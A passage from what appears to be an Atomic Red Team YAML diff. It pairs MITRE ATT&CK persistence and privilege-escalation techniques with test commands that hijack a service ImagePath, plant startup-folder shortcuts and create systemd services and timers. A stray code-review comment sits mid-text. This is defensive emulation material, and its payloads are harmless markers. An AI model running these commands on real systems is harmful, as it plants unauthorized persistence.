(Citation: US-CERT + Alert TA15-314A Web Shells) " + atomic_tests: [] + T1574.010: + technique: + created: '2020-03-12T20:43:53.998Z' + modified: '2020-09-16T19:10:04.262Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. 
+ name: Services File Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.010 + url: https://attack.mitre.org/techniques/T1574/010 + - external_id: CAPEC-17 + source_name: capec + url: https://capec.mitre.org/data/definitions/17.html + x_mitre_platforms: + - Windows + x_mitre_detection: "Look for changes to binaries and service executables that + may normally occur during software updates. If an executable is written, renamed, + and/or moved to match an existing service executable, it could be detected + and correlated with other suspicious behavior. Hashing of binaries and service + executables could be used to detect replacement against historical data.\n\nLook + for abnormal process call trees from typical processes and services and for + execution of other commands that could relate to Discovery or other adversary + techniques. " + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + atomic_tests: [] + T1574.011: + technique: + created: '2020-03-13T11:42:14.444Z' + modified: '2020-09-16T19:07:48.590Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c + description: "Adversaries may execute their own malicious payloads by hijacking + the Registry entries used by services. 
Adversaries may use flaws in the permissions + for registry to redirect from the originally specified executable to one that + they control, in order to launch their own code at Service start. Windows + stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. + The information stored under a service's Registry keys can be manipulated + to modify a service's execution parameters through tools such as the service + controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), + or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys + is controlled through Access Control Lists and permissions. (Citation: Registry + Key Security)\n\nIf the permissions for users and groups are not properly + set and allow access to the Registry keys for a service, then adversaries + can change the service binPath/ImagePath to point to a different executable + under their control. When the service starts or is restarted, then the adversary-controlled + program will execute, allowing the adversary to gain persistence and/or privilege + escalation to the account context the service is set to execute under (local/domain + account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also + alter Registry keys associated with service failure parameters (such as FailureCommand) + that may be executed in an elevated context anytime the service fails or is + intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: + Tweet Registry Perms Weakness) " + name: Services Registry Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.011 + url: https://attack.mitre.org/techniques/T1574/011 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html 
+ - source_name: Registry Key Security + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. + Retrieved March 16, 2017. + - source_name: Kansa Service related collectors + url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html + description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and + analysis. Retrieved October 10, 2019.' + - source_name: Tweet Registry Perms Weakness + url: https://twitter.com/r0wdy_/status/936365549553991680 + description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved + April 9, 2018." + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' + x_mitre_detection: |- + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. 
+ + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. + + Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Application control + identifier: T1574.011 + atomic_tests: + - name: Service Registry Permissions Weakness + auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
+ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service check + type: String + default: weakservicename + executor: + command: | + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL + name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt + T1547.009: + technique: + id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 + description: |- + Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. 
+ + Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. + name: Shortcut Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.009 + url: https://attack.mitre.org/techniques/T1547/009 + - external_id: CAPEC-132 + source_name: capec + url: https://capec.mitre.org/data/definitions/132.html + - source_name: BSidesSLC 2020 - LNK Elastic + url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ + description: French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger + Than Its Weakest LNK. Retrieved November 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-13T21:30:24.555Z' + created: '2020-01-24T19:00:32.917Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - David French, Elastic + - Bobby, Filar, Elastic + - Travis Smith, Tripwire + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections. 
+ + Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic) + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.009 + atomic_tests: + - name: Shortcut Modification + auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce + description: | + This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; + gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. + Upon execution, calc.exe will be launched. + supported_platforms: + - windows + input_arguments: + shortcut_file_path: + description: shortcut modified and execute + type: path + default: "%temp%\\T1547.009_modified_shortcut.url" + executor: + command: | + echo [InternetShortcut] > #{shortcut_file_path} + echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} + #{shortcut_file_path} + cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 + +' + name: command_prompt + - name: Create shortcut to cmd in startup folders + auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 + description: | + LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + to view the new shortcut. 
+ supported_platforms: + - windows + executor: + command: | + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1037.005: + technique: + id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f + description: "Adversaries may use startup items automatically executed at boot + initialization to establish persistence. Startup items execute during the + final phase of the boot process and contain shell scripts or other executable + files along with configuration information used by the system to determine + the execution order for all startup items. (Citation: Startup Items)\n\nThis + is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), + and thus the appropriate folder, /Library/StartupItems isn’t + guaranteed to exist on the system by default, but does appear to exist by + default on macOS Sierra. A startup item is a directory whose executable and + configuration property list (plist), StartupParameters.plist, + reside in the top-level directory. 
\n\nAn adversary can create the appropriate + folders/files in the StartupItems directory to register their own persistence + mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since + StartupItems run during the bootup phase of macOS, they will run as the elevated + root user." + name: Startup Items + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.005 + url: https://attack.mitre.org/techniques/T1037/005 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:47:39.124Z' + created: '2020-01-15T18:00:33.603Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. + + Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. 
+ x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.005 + atomic_tests: + - name: Add file to Local Library StartupItems + auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 + description: | + Modify or create an file in /Library/StartupItems + + [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + supported_platforms: + - macos + executor: + command: 'sudo touch /Library/StartupItems/EvilStartup.plist + +' + cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist + +' + name: sh + elevation_required: true + T1542.001: + technique: + id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada + description: |- + Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) + + System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. + name: System Firmware + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.001 + url: https://attack.mitre.org/techniques/T1542/001 + - external_id: CAPEC-532 + source_name: capec + url: https://capec.mitre.org/data/definitions/532.html + - url: https://en.wikipedia.org/wiki/BIOS + description: Wikipedia. 
(n.d.). BIOS. Retrieved January 5, 2016. + source_name: Wikipedia BIOS + - url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface + description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. + Retrieved July 11, 2017. + source_name: Wikipedia UEFI + - url: http://www.uefi.org/about + description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. + source_name: About UEFI + - url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research + description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE + Firmware Security Research. Retrieved January 5, 2016. + source_name: MITRE Trustworthy Firmware Measurement + - url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about + description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions + about BIOS Security. Retrieved December 11, 2015.' + source_name: MITRE Copernicus + - url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ + description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against + Vault 7 Disclosure Scanning. Retrieved March 13, 2017. + source_name: McAfee CHIPSEC Blog + - url: https://github.com/chipsec/chipsec + description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment + Framework. Retrieved March 20, 2017. + source_name: Github CHIPSEC + - url: http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html + description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. + Retrieved March 20, 2017. 
+ source_name: Intel HackingTeam UEFI Rootkit + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-05-19T21:22:37.865Z' + created: '2019-12-19T19:43:34.507Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Jean-Ian Boutin, ESET + - McAfee + - Ryan Becwar + x_mitre_data_sources: + - 'Firmware: Firmware Modification' + x_mitre_detection: |- + System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. + + Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit) + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Host intrusion prevention systems + - Anti-virus + - File monitoring + atomic_tests: [] + T1543.002: + technique: + id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b + description: "Adversaries may create or modify systemd services to repeatedly + execute malicious payloads as part of persistence. 
The systemd service manager + is commonly used for managing background daemon processes (also known as services) + and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: + Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization + (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, + CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit + and Upstart while remaining backwards compatible with the aforementioned init + systems.\n\nSystemd utilizes configuration files known as service units to + control how services boot and under what conditions. By default, these unit + files are stored in the /etc/systemd/system and /usr/lib/systemd/system + directories and have the file extension .service. Each service + unit file may contain numerous directives that can execute system commands:\n\n* + ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands + when a services is started manually by 'systemctl' or on system start if the + service is set to automatically start. \n* ExecReload directive covers when + a service restarts. 
\n* ExecStop and ExecStopPost directives cover when a + service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd + functionality to establish persistent access to victim systems by creating + and/or modifying service unit files that cause systemd to execute malicious + commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries + typically require root privileges to create/modify service unit files in the + /etc/systemd/system and /usr/lib/systemd/system + directories, low privilege users can create/modify service unit files in directories + such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: + Rapid7 Service Persistence 22JUNE2016)" + name: Systemd Service + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1543.002 + url: https://attack.mitre.org/techniques/T1543/002 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - source_name: Freedesktop.org Linux systemd 29SEP2018 + url: https://www.freedesktop.org/wiki/Software/systemd/ + description: Freedesktop.org. (2018, September 29). systemd System and Service + Manager. Retrieved April 23, 2019. + - source_name: Anomali Rocke March 2019 + url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang + description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With + a New Malware Family Written in Golang. Retrieved April 24, 2019. 
+ - source_name: Rapid7 Service Persistence 22JUNE2016 + url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence + description: Rapid7. (2016, June 22). Service Persistence. Retrieved April + 23, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.701Z' + created: '2020-01-17T16:15:19.870Z' + x_mitre_platforms: + - Linux + x_mitre_detection: |- + Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. 
+ x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_contributors: + - Tony Lambert, Red Canary + identifier: T1543.002 + atomic_tests: + - name: Create Systemd Service + auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + description: 'This test creates a Systemd service unit file and enables it as + a service. + +' + supported_platforms: + - linux + input_arguments: + systemd_service_path: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system" + systemd_service_file: + description: File name of systemd service unit file + type: String + default: art-systemd-service.service + execstoppost_action: + description: ExecStopPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstoppost-marker" + execreload_action: + description: ExecReload action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execreload-marker" + execstart_action: + description: ExecStart action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstart-marker" + execstop_action: + description: ExecStop action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstop-marker" + execstartpre_action: + description: ExecStartPre action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpre-marker" + execstartpost_action: + description: ExecStartPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpost-marker" + executor: + command: | + echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} + echo "Description=Atomic Red Team Systemd Service" >> 
#{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} + echo "Type=simple" + echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} + echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + systemctl enable #{systemd_service_file} + systemctl start #{systemd_service_file} + cleanup_command: | + systemctl stop #{systemd_service_file} + systemctl disable #{systemd_service_file} + rm -rf #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + name: bash + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. 
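Review bot: in the T1543.002 Create Systemd Service executor, `echo "Type=simple"` has no `>> #{systemd_service_path}/#{systemd_service_file}` redirect, so that line goes to stdout and the unit file is written without a Type= entry; the test still behaves as intended only because simple is systemd's default, so the redirect should be added to match the surrounding lines. The test also writes to /etc/systemd/system and runs `systemctl enable`, yet declares no `elevation_required: true` (unlike the T1505.002 test later in this file); add the flag so runners know root is required.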
.service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. 
Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. 
+ + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1053.006 + atomic_tests: + - name: Create Systemd Service and Timer + auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b + description: "This test creates Systemd service and timer then starts and enables + the Systemd timer \n" + supported_platforms: + - linux + input_arguments: + path_to_systemd_service: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system/art-timer.service" + path_to_systemd_timer: + description: Path to service timer file + type: Path + default: "/etc/systemd/system/art-timer.timer" + systemd_service_name: + description: Name of systemd service + type: String + default: art-timer.service + systemd_timer_name: + description: Name of systemd service timer + type: String + default: art-timer.timer + executor: + command: | + echo "[Unit]" > #{path_to_systemd_service} + echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} + echo "[Service]" >> #{path_to_systemd_service} + echo "Type=simple" >> #{path_to_systemd_service} + echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} + echo "[Install]" >> #{path_to_systemd_service} + echo "WantedBy=multi-user.target" >> 